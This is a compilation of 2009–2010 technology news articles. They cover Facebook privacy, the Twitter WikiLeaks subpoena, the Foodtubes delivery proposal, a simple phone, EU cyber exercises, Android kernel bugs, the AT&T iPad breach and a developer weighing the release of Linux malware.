News Security

Facebook’s Zuckerberg Questions Privacy Expectations

  • January 11, 2010
  • By Tom Jowitt

Privacy is no longer a social norm, according to the founder of Facebook, Mark Zuckerberg commenting on the rise of social networking

Mark Zuckerberg, the founder and chief executive of Facebook has said that people no longer have an expectation of privacy thanks to increasing uptake of social networking.

Speaking at the Crunchie Awards in San Francisco this weekend, the 25 year-old web entrepreneur said: “People have really gotten comfortable not only sharing more information and different kinds but more openly and with more people.”

Zuckerberg went on to add that the rise of social media reflects the changing attitudes among the general public, saying that this radical change has happened in the space of five years.

“When I got started in my dorm room at Harvard, the question a lot of people asked was, ‘why would I want to put any information on the Internet at all? Why would I want to have a website?’,” he said.

“And then in the last 5 or 6 years, blogging has taken off in a huge way and all these different services that have people sharing all this information,” he said.

Facebook is estimated to have over 100 million users in the United States alone, and more than 350 million users worldwide. Zuckerberg’s comments come after the social networking giant recently decided to (somewhat controversially) change the privacy settings of all its users.

In December, Facebook launched a number of new tools which enabled users to control who sees what content on their account, as well as a Transition Tool and simplified privacy settings.

The issue of privacy is a vexed one, especially in the United Kingdom where, late last year, the Home Office pledged to push ahead with controversial plans to monitor all Internet use. The Ministry is requiring communications firms to monitor all Internet use, and is asking them to retain information on how people use social networks such as Facebook.

Yet the dangers posed by people opening up online to the rest of the world is well know. Back in August, a survey sponsored by British insurance firm Legal & General found that users of social networking sites were giving away vital information about themselves and their whereabouts that was being used by professional burglars to establish a list of targets. The report, “The Digital Criminal,” found that 38 percent of users of sites such as Facebook and Twitter have posted status updates detailing their holiday plans and a third of people have posted status updates saying that they are away for the weekend.

Zuckerberg also said it was important for companies such as Faceook, to reflect the changing social norms in order to remain relevant and competitive.

“A lot of companies would be trapped by the conventions and their legacies of what they’ve built,” he said. “Doing a privacy change for 350 million users is not the kind of thing that a lot of companies would do.

“But we viewed that as a really important thing, to always keep a beginner’s mind and what would we do if we were starting the company now and we decided that these would be the social norms now and we just went for it.”

Photo credit: (CC) Brian Solis, / / CC-BY

News Security Wikileaks

Twitter Fights US Court Demands For WikiLeaks Details

 by Brian Prince

Twitter is fighting a US court’s demand, made in December, for details of WikiLeaks supporters

Micro-blogging site Twitter is opposing an order from a US court, to reveal the account details of supporters of WikiLeaks. Twitter has called on Facebook and Google to reveal whether they also received similar court orders.

As part of the US government’s investigation into WikiLeaks, a court ordered Twitter, in mid-December, to give details of accounts owned by supporters of the whistle-blower site. Twitter has protested against the subpoena and informed the individuals whose account information has  been requested, while raising the possibility that other social networking players have received similar orders.

Records required for criminal investigation

The US Department of Justice obtained a subpoena for the micro-blogging site on 14 December, requesting records going back to 1 November 2009, that are “relevant and material to an ongoing criminal investigation.” Among those targeted are WikiLeaks founder Julian Assange, Dutch hacker Rop Gonggrijp (whose name is misspelled in the subpoena) and Bradley Manning, the US Army intelligence analyst suspected of leaking documents to WikiLeaks.

Also named in the subpoena are computer programmer Jacob Appelbaum (identified by his Twitter username, ioerror) and former WikiLeaks volunteer and current Icelandic parliament member Birgitta Jónsdóttir (left), who wrote the following in a tweet: “just got this: Twitter has received legal process requesting information regarding your Twitter account in (relation to wikileaks).”

Jónsdóttir also tweeted that she plans to oppose the subpoena.

According to a copy of the court order published by (PDF), the government is looking for a variety of information, including session times and mailing addresses.

“WikiLeaks strongly condemns this harassment of individuals by the US government,” WikiLeaks said in a statement relayed to Reuters by WikiLeaks attorney Mark Stephens.

The recent WikiLeaks controversy began when the site started publishing a trove of US diplomatic cables in late November. The release of the documents has touched off months of debate and prompted WikiLeaks supporters and opponents alike to air their differences with denial-of-service attacks while businesses such as PayPal cut ties with the whistle-blower site.

In December, Assange was arrested in the UK on charges of sexual assault originating in Sweden. He is currently out on bail.

In its statement, WikiLeaks reportedly said that some of the people named in the subpoena were key figures in helping WikiLeaks make public US military video of a 2007 airstrike that killed Iraqi civilians. WikiLeaks is instructing its lawyers to oppose the subpoena, and is calling on Facebook and Google to disclose whether they received similar subpoenas as well.

A federal judge unsealed the court order on 5 January after Twitter requested the right to inform the people being targeted.

In addition to obtaining the subpoena, it was also revealed that the US government has taken steps to protect people judged by officials to be in danger because of the document leak. On 7 January, US State Department spokesperson P.J. Crowley told the media the department has helped relocate “a handful of people” identified in the diplomatic documents out of concern for their safety. The CIA set up a WikiLeaks Task Force (WTF) in response to the leak.

WikiLeaks has denied putting any lives at risk, and the UN has supported its right to publish the leaked material on human rights grounds.

WikiLeaks publication of the US cables resulted ina war of denial of service (DoS) attacks, hitting both WikiLeaks itself , and the sites of financial institutions such as Mastercard, which withdrew facilities for WikiLeaks supporters to donate money to the whistleblower.


Foodtubes Proposes Underground ‘Physical Internet’

 by Peter Judge

Automatically routed canisters could replace lorries with an Internet of things, says Foodtubes

A group of academics is proposing a system of underground tunnels which could deliver food and other goods in all weathers with massive energy savings.

The Foodtubes group wants to put goods in metal capsules 2m long, which are shifted through underground polyethylene tubes at speeds of up to 60 miles per hour, directed by linear induction motors and routed by intelligent software to their destinations.

The group, which includes an Oxford physics professor and logistics experts, wants £15 million to build a £5 mile test circuit, and believes the scheme could fund itself if used by large supermarkets and local councils and could expand because it uses an open architecture.

Underground tubes and linear motors

“In the long term, we could see an ostrich slaughtered in Cape Town, and delivered to Edinburgh.” said Noel Hodson, Foodtubes’ CEO and a project planner.

On a more practical scale, the group has developed a plan for the London borough of Croydon, which would link all the food outlets, schools and other major buildings in the London borough of Croydon. “It would cost £400 million to build and, if run by the council or a consortium, it would make £80 million a year,” said Hodson, who says Transport for London has also expressed an interest.

The proposal uses lightweight capsules, which are roughly the same size as the cages that are carried by supermarket lorries, Hodson explained. They are moved by an electromagnetic “kick” from linear induction motors built into the side of the underground tubes and, at junctions, are steered one way or another by other linear motors operating under computer control.

The group moved to linear induction motors, when it realised that vacuum power, normally used in smaller capsule transport systems, would be impractical on this scale.

Energy efficient

The energy savings over road distribution would be huge, since around 92 percent of the diesel burnt by a lorry is used to transport the vehicle itself, which spends much of its time driving around almost empty. As well as this, increasing amounts of the electricity used by the system could come from green sources, said Hodson.

“It’s a difficult project to take forward, as it is innovative and involves new infrastructure,” said Hodson, in something of an understantement. “Governments shudder at getting involved, and research and development funding is scarce.”

However, he believes that a couple of large retailers would be enough to get it off the ground. “We do have communications with a major supermarket group,” he said.

Other members of the team include Fred Taylor, Halley professor of physics at Oxford University, and logistics consultant Jonathan Carter, who lectures at Imperial College London.

The idea could play well with ideas from IBM, which addressed green transport at its Start summit earlier this year and HP which wants to instrument the world with trillions of sensors.

Ironically, however, the first interest may come from companies who stand to suffer if lorries are made obsolete. Foodtubes is talking to two oil firms about providing a system to supply remote stations in the permafrost of Canada, and in the deserts of the Middle East, said Hodson.


John’s Phone Launched for Technophobes

 by Pichayada Promchertchoo

A Dutch company has launched what it calls “the world’s simplest phone”, targeting users who are sick of new-generation models

Only capable of making and receiving calls, John’s Phone is dubbed the world’s simplest mobile phone, specifically designed for anti-smartphones users.

It does not provide any hi-tech features. No apps. No Internet. No camera. No text messaging. All you have to do – in fact, all you can do – is call, talk and hang up.


Named after the company that created it – John Doe, a full-service advertising agency in Amsterdam – the phone is designed for users who are fed up with smartphones and their hi-tech functions.

Its extreme simplicity is designed to appeal to technophobes, the elderly and young kids buying their first phones.

“John’s Phone is easy to use wherever you go. It’s the no-contract cell phone you’ve been waiting for, without any frills or unnecessary features”, the company stated.

Retro Look

In an effort to make it extremely retro, John Doe also provides a small paper-based address book and a pen for storing contacts. They can be slid into the back of the phone.

Other features include a 1200 mAh battery with three weeks stand-by time, a single ringtone, speed dial with enough memory to store ten numbers and a hands-free kit. It is 10.5 x 6 x 1.5 cm and weighs in at 95 grams.

The phone is available in five colours: white, black, brown, greyish-green and pink. The prices range from around £60 to £80.

Goverment IT News Security

Europe Holds Cyber-Warfare Test

The Cyber Europe 2010 will simulate an attack designed to cut Europe’s nations off from one another

Europe’s cyber security experts are staging a simulated cyber-attack on critical services today, across several EU member states.

The “Cyber Europe 2010″ test will test Europe’s readiness for an attack which attempts to paralyse online services so internet connectivity is gradually lost between European countries. It follows the announcement of measures to strengthen and modernise the European Network and Information Security Agency (ENISA) to combat cyber warfare.

Testing links between states

Details of the exercise are being kept under wraps, but ENISA has been at pains to emphasise that this is not an operational test like the US Department of Homeland Security’s Cyber Storm, a series of week-long multi-million dollar tests of America’s attack-readiness.

“Our budget is in the order of hundred of Euros,” said an ENISA spokesman, adding that the test will not involve critical sectors, or industry and will not test response capabilities. Above all it will not carry the risk of a real network crash – it just tests how well agencies can share information.

By contrast, the US Cyber Storm III exercise, one month ago, was an operational exercise, which included industry and cost millions of dollars, the spokesman said.

During the exercise, through the day, one country after another will face fictitious access problems, and will co-operate on a response, testing their communications in the process. The exercise has been developed since November 2009, and will be followed by more complex scenarios, eventually going all the way to global tests.

“This exercise to test Europe’s preparedness against cyber threats is an important first step towards working together to combat potential online threats to essential infrastructure and ensuring citizens and businesses feel safe and secure online,” said Neelie Kroes, vice president of the European Commission for the Digital Agenda,
who is visiting the UK’s cyber-attack centre during the simulation exercise,

The exercise is based on fears that a denial of service attack by hackers could effectively put all major cross-country connections in Europeout of action, and make it difficult for businesses and citizens to access services such as eGovernment. In such an attack, the plan is to re-route communications.

Yesterday saw evidence that the fears are based on reality. The state of Myanmar (formerly Burma) was virtually cut off with a distributed denial of service (DDoS) attack. In the UK, Home Secretary Theresa May has promised increased support for cyber-warfare measures following warnings from the head of GCHQ that Britain faces “credible” cyber-attack threats.

Mobile & Wireless News Security

Serious Security Bugs Found In Android Kernel

An analysis of Google Android Froyo’s open-source kernel has uncovered 88 flaws that could expose users’ data

An analysis of the kernel used in Google’s Android smartphone software has turned up 88 high-risk security flaws that could be used to expose users’ personal information, security firm Coverity said in a report published on Tuesday.

The results, published in the 2010 edition of the Coverity Scan Open Source Integrity Report, are based on an analysis of the Froyo kernel used in HTC’s Droid Incredible handset.

Enterprise fears

The results arrive as Android is increasing its market share and increasingly being used in the enterprise.

While Android implementations vary from device to device, Coverity said the same flaws were likely to exist in other handsets as well. Coverity uncovered a total of 359 bugs, about one-quarter of which were classified as high-risk.

The report analysed a total of 61 million lines of open source code from 291 widely used projects, including Apache, Linux, PHP and Samba.

While Android’s density of bugs per thousand lines of code was lower than the average found in open source software overall, it was higher than that of the Linux kernel, according to Coverity. The company said some of the bugs appeared to be important enough to have been addressed before the code was released.

Fixes demanded

Coverity said it will hold off releasing the details of the flaws until January to allow Google and handset vendors to issue fixes. The flaws could be patched via an over-the-air update, Coverity said.

Canalys reported on Monday that Android now dominates the US smartphone market with a 44 percent share, up from 33 percent in the second quarter of this year.

While the deployment of Android on large numbers of handsets has allowed the software to claw market share away from competitors such as RIM, some have criticised Google’s “hands-off” approach for harming the quality of Android and its applications.

Goverment IT News Security

Most Consumers Support Government Cyber-Spying

Sixty-three percent of people believe that it is acceptable for their government to spy on another country’s computer systems

Nearly two thirds of computer users globally believe that it is acceptable for their country to spy on other nations by hacking or installing malware, according to Sophos’s mid-year 2010 Security Threat Report, with 23 percent claiming to support this action even during peace time.

One in 14 respondents to the survey claimed to believe that crippling denial of service (DDoS) attacks against another country’s communication or financial websites – like the one used to target Russian banks earlier this year – are acceptable during peace time. Nearly half said such an attack was only acceptable when two countries were at war, and 44 percent said it was never acceptable.

Graham Cluley

“I think there might be an attitude of all’s fair in love and war,” said Graham Cluley, senior technology consultant at Sophos, speaking to eWEEK Europe. “There’s always been one rule for your country and another rule for your citizens.

“But it goes one stage further when you begin to ask, is it all right to launch attacks against communication systems and financial systems?” he added. “You can image the chaos that would ensue if there were organised denial of service attacks on a regular basis, purely to give your country an economic advantage.”

All’s fair in love and war

Cluley believes the attitudes of respondents are largely down to an ingrained cynicism about the role of governments in war. Governments have always spied on each other, and “used every dirty trick in the book” to do so, said Cluley. “Why wouldn’t they use the Internet to do this as well? If it’s your country’s interests at heart, and if they’re protecting your country, then you might think, ‘I don’t really care what they do’.”

Perhaps more surprisingly, 32 percent of respondents to Sophos’s survey said that countries should also be allowed to plant malware and hack into private foreign companies in order to spy for economic advantage.

“It’s kind of curious, because these are the people that have got no time for hackers and the bad guys at all, but seem to think it’s all right for countries to do this,” said Cluley. “I think they need to remember that, one day, it might be a country attacking your company’s network, and trying to infiltrate it, and how are you going to feel about it then?”

Malware-hosting websites

The Security Threat Report also found that the US is still has the majority (42.29 percent) of malware-hosting websites. These are websites that have been set up with the intention of infecting visitors, or legitimate websites that have been compromised by hackers. The UK was sixth on the list, with 2.41 percent hosted in this country.

According to Cluley, many of these websites are legitimate ones that have been targeted by hackers. “Businesses could end up infecting their customers, leaving them open to fraud,” he warned. Some hackers also use aggressive search engine optimisation techniques to push infected websites to the top of search results.

This news could be of particular concern, in light of the fact that the UK government recently axed plans for an increase in funding to the Metropolitan Police’s cyber crime unit. With online fraud and other electronic crimes becoming increasingly commonplace, the Police Central e-crime Unit had been hoping for extra funding from the Home Office for training and equipment purposes. However the extra funding was cut as part of the coalition government’s £6 billion deficit reduction plans.

“There is concern that at the moment the cyber crime authorities are pretty pitifully funded for the level of crime that is going on,” said Cluley. “I think the one thing we can be sure of is that the cyber criminals aren’t cutting their investment in this kind of crime. We are seeing more attacks than ever before. We see 60,000 pieces of new malware every single day, which is simply staggering, but that’s the level of crime that we’re seeing. So companies need to keep on top of this problem.”

Mobile & Wireless News Security

iPad Breach Could Heavily Impact Privacy

The AT&T; security breach that exposed some Apple iPad owners’ email addresses could help attackers carry out “IMSI catching”

The security breach at AT&T that exposed the email addresses of a reported 114,000 owners of the iPad with Wi-Fi + 3G could potentially impact privacy more than was initially thought.

Two security researchers told eWEEK that the ICCIDs (integrated circuit card identifiers) of iPad owners could be used to determine their IMSIs (International Mobile Subscriber Identities). With an IMSI in hand, it would be easier for an attacker to potentially find the person in an area by using an IMSI catcher to scan for mobile devices.

“You can do this without knowing the IMSIs of people, but you won’t know which IMSI belongs to which user,” explained independent security researcher Nick DePetrillo. “There are other ways to determine that, but knowing ahead of time also helps, like in the case of the AT&T leak.”

ICCIDs provide a route in

A group going by the name Goatse Security told that it was able in the AT&T breach “to guess a large swath of ICCIDs by looking at known iPad 3G ICCIDs … which can also be obtained through friendly associates who own iPads and are willing to share their information, available within the iPad ‘Settings’ application,” said a Valleywag post by Ryan Tate.

Goatse Security used a script on AT&T’s website to obtain the email addresses. “When provided with an ICCID as part of an HTTP request, the script would return the associated email address,” Tate wrote.

While AT&T said in a statement late June 9 the only information that could be derived from the ICCIDs was the email address attached to a particular device, DePetrillo and Don Bailey, a security consultant at iSec Partners, said the iPad information could help attackers launch a technically difficult attack on information that flows on the non-3G data portions of the GSM network.

Through IMSI catching, an attacker could potentially intercept control messages or other data that might not be protected by the stronger encryption of the 3G data network. There is no known way to directly compromise or take control of a user’s iPad with this information, however.

“Most US GSM providers encode a unique portion of the International Mobile Subscriber Identity within the ICCID,” Bailey explained. “The IMSI is unique to each subscriber on the GSM network and is considered a protected value … Though the threat of IMSI catching is low, the attack can lead to a loss of personal privacy or an abuse of the victim’s mobile device.”

Complex, but worthwhile for an attacker

The technical difficulty of IMSI catching is currently high when trying to manipulate 3G data networks, but may be worthwhile for an attacker due to the high profile of individuals affected by the attack, he said. For now, the capability is limited to a handful of individuals, but anyone with a large enough budget can replicate the technique with varying success, he added.

“The equipment required to execute such an attack is decreasing,” Bailey said. “With the appropriate technical knowledge, an attacker can leverage equipment costing only a few thousand dollars to perform this attack within approximately a square mile of coverage. Traffic from handsets within that coverage area may be redirected through the IMSI catcher, which then may lead to a loss of privacy or an abuse of mobile handsets.”

Bailey suggested that the affected iPad owners consider requesting a new SIM (Subscriber Identity Module) card from AT&T.

DePetrillo said the iPad using 3G for data transfer has stronger encryption than just GSM voice, the typical target of IMSI catching. As a result, a man-in-the-middle attack using an advanced IMSI catcher won’t get user data in clear text. Still, the researcher said, there is a possibility that an attacker could intercept and manipulate any non-3G data.

“It really comes down to [the fact that] giving any advantages to the attacker, including just unique numbers with names, can help them and that’s never a good thing … For the average consumer, [this is] not that big a deal—the bigger deal is information leakage of your identity and that unique number from AT&T,” DePetrillo said.

News Security

Ofcom Lets Small ISPs Off Filesharing Laws

Ofcom plans to exempt small ISPs from the Digital Economy Act’s anti file-sharing measures

Internet Service Providers with less than 400,000 customers will be exempt from one of the most onerous sections of the Digital Economy Act, under proposals from Ofcom.

Ofcom has been working on a new code of practice for ISPs that have to deal with copyright infringement claims, under the terms of the controversial Digital Economy Bill, which was passed into law in early April, despite only two hours of debate in the Houses of Parliament. The bill requires ISPs to act against users who persistently infringe copyright by sharing files illegally.

Smaller ISPs Are Exempt

Under the new Ofcom proposals, ISPs with less than 400,000 subscribers will not have to issue warning letters to customers accused of illegally downloading content.

And it seems that mobile broadband operators will also be exempt, at least for now. Apart from anything else, mobile broadband is set up in a way which makes it much harder to track file-sharers according to several reports.

It is believed that there are currently only six to eight ISPs with more than 400,000 broadband customers in the UK market, and these large ISPs will be liable to follow the rules set down in the Act.

The reason why the large ISPs will have to toe the line, whilst the smaller operators can escape the regulations, is that most Ofcom agrees with the ISPs that they simply have not been given enough time to develop a code for something so complex.

“Due to the short timescales Ofcom has been working to, the Code will be instructional rather than setting out line-by-line what is required,” blogged Trefor Davies, Chief Technology Officer at ISP Timico. “For example, instead of dictating a standard approach for a CIR (Copyright Infringement Report), those affected will have to tell Ofcom how they will go about it and Ofcom will then approve it or recommend changes.”

But Large ISPs Have To Comply

But it seems that the large ISPs such as TalkTalk, BT, Virgin Media, will have to compile for now, despite opposition from the ISP community.

Late last year, Virgin Media revealed that it was already trialling a tool that could monitor illegal file-sharing over the Internet, although the European Commission said it would investigate the legality of the software.

The first draft of Ofcom’s code is expected to be published in the following few weeks, with a further statement to come in September. The code must then be submitted to the European Commission for approval.

Once it has been given the EC blessing, Ofcom will have to update the Secretary of State with quarterly reports detailing the levels of illegal file-sharing in the UK, as well as the extent of legal action by copyright owners.


Developer Ponders Release of Linux Malware

  • December 1, 2009
  • By Tom Jowitt

The lack of malware on Linux may be about to change after a developer admitted he has developed a ‘package of malware for Unix/Linux’

A developer who claims he is tired of the “Linux is secure” argument has set out to develop a “package of malware for Unix/Linux” in order to help ethical hackers demonstrate the vulnerability of the open-source operating system.

“I was fed up with the general consensus that Linux is oh-so-secure and has no malware,” a developer going by the name of buchner.johannes wrote on Ask Slashdot, in posting filed by kdawson.

“After a week of work, I finished a package of malware for Unix/Linux,” Johannes wrote. “Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects.”

Johannes said the malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads.

“I tested it to be injected by a PHP script (even circumventing safe mode), so that the web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine. If executed by the user, the malware can persist itself in cron, bashrc and other files,” he said.

Johannes claimed the object of the exercise was to provide a payload so security people can ‘pwn’ systems to show security holes, without doing harm (such as deleting files or disrupting normal operation).

However, he admitted to doubts over how ethical it would be to release the toolkit.

He has concerns that a genuine hacker would rip out the BOINC payload and put “in something really evil, could be turned into proper Linux malware.”

“On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed. On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary,” he said.

“Technically, it is a nice piece, but should I release it? I don’t want to turn the Linux desktop into Windows, hence I’m slightly leaning towards not releasing it. What does your ethics say about releasing such grayware?” he asked.

There was a mix of opinions to Johannes’s debate over releasing the malware. One user by the name of Jeff321 said that he believed Johannes has already decided.

“There were two options,” Jeff321 wrote. “1. Release it anonymously and take no credit. 2. Write about it and get some credit (but then you can’t actually release it due to legal issues).”

“You can’t (and won’t) release it now,” he added. “If somebody gets attacked with your code, guess who they’re going to prosecute and/or sue.”

Another user, by the name of sopssa also waded in. “The summary says it doesn’t actually do anything malicious and it isn’t a worm. There is no legal reason why he couldn’t release the code and/or a paper about it,” said sopssa.

“The thing is, it’s stupid for people to keep thinking their systems are insanely secure,” he wrote. “Linux users fall for this all the time because they’ve heard so from lots of other Linux users. It’s better to show people that it is actually possible, and maybe it leads to better-secured systems too.”